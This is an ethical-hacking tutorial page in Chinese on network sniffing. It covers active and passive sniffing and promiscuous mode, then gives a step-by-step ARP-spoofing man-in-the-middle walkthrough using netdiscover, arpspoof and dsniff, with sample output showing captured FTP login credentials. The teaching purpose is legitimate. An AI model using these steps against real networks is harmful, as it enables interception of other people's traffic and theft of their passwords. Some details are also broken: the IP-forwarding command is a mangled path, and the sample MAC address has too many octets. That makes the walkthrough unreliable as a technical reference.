Venom Academy/道德駭客/嗅探
| 一位華夏公益教科書使用者建議將本書或章節合併到駭客工具中。 請在討論頁面上討論是否應該進行合併。 |
在本節中,我們將深入探討嗅探。嗅探可以定義為透過捕獲網路(有線或無線)上的資料包來收集資料的一種方法。嗅探的主要目標是捕獲未加密的通訊。讓我們更詳細地瞭解它。
嗅探基本上分為兩類,將在下面解釋。
- 主動嗅探
- 被動嗅探
主動嗅探發生在攻擊者透過傳送資料包請求並監聽響應與受害者機器直接互動時。一些示例可能包括 ARP 欺騙和中間人攻擊。
被動嗅探發生在攻擊者不與目標機器直接互動時,僅當攻擊者僅嗅探資料包而不執行攻擊時才會發生。
在任何網路上進行嗅探之前,您首先需要了解混雜模式和非混雜模式之間的區別,在本例中,它們與網絡卡相關聯。預設情況下,您的網絡卡設定為非混雜模式,這意味著機器只會接收僅針對您的資料包。在混雜模式下,網絡卡將強制允許我們捕獲所有不針對我們計算機的流量。
MITM 攻擊的主要目標是攻擊者可以將自己置於兩臺機器之間的通訊中間。例如,有人登入 Facebook,如果我們使用 MITM,攻擊者會將自己置於受害者和 Facebook 伺服器之間。因此,所有通訊都可以被攻擊者捕獲。
ARP 欺騙是用來攔截兩臺機器之間通訊的最流行的攻擊。這是透過向兩個可能的攻擊目標和伺服器傳送虛假的 ARP 響應來實現的。它的工作原理是攻擊者會向網路上的任何計算機發送虛假的 ARP 響應,以使計算機相信攻擊者的 IP 與某個地址相關聯。因此,計算機變得困惑,並可能將資料包傳送給攻擊者,認為它是合法的伺服器。
在我們進行 MITM 攻擊之前,我們需要先啟用 IP 轉發,以便流量可以轉發到其預期的目的地。要執行此操作,請使用以下命令
root@venom [$]~ echo 1 > proc ipfoward
現在我們已經啟用了 IP 轉發,我們需要收集資訊來執行 MITM 攻擊,所需的資訊是
- 攻擊者的 IP 地址
- 受害者的 IP 地址
- 預設閘道器值
要查詢您的 IP,您可以使用 ifconfig 命令。然後,要查詢受害者的 IP,我們可以使用以下命令
netdiscover
Netdiscover 將列出網路中的所有機器,您只需要複製受害者的 IP 地址即可。預設閘道器也將顯示在 netdiscover 中。現在,要執行 MITM 攻擊,我們首先需要使用 arpspoof 執行 ARP 欺騙攻擊,命令語法如下所示
arpspoof -i <the interface you are using> -t <target host> <gateway address>
這裡我們將向您展示一個示例及其輸出。
root@venom [$]~ arpspoof -i eth0 -t 192.168.75.142 192.168.75.2 0a:12:18:1a:2b:16:32:8c 0806 ARP reply 192.168.75.2 is-at 0a:12:18:1a:2b:16:32:8c
正如我們上面所看到的,我們的 ARP 欺騙攻擊執行良好。現在我們需要將我們接收到的所有流量傳送到一個名為dSniff的工具。現在執行以下命令
dsniff
在我們的示例中,dsnif 返回了以下輸出
root@venom [$]~ dsniff dsniff: listening on eth0 --------------------------------------- 07/23/13/ 07:14:20 tcp 192.168.75.142 -> venom.machines.com 21 (ftp) USER anonymous PASS IFuser
如我們的示例所示,dsnif 設法在 MITM 攻擊期間返回了收集到的密碼
請注意,有很多工具可用於嗅探,我們可以研究它們,但這裡無法全部列出。
混雜模式和非混雜模式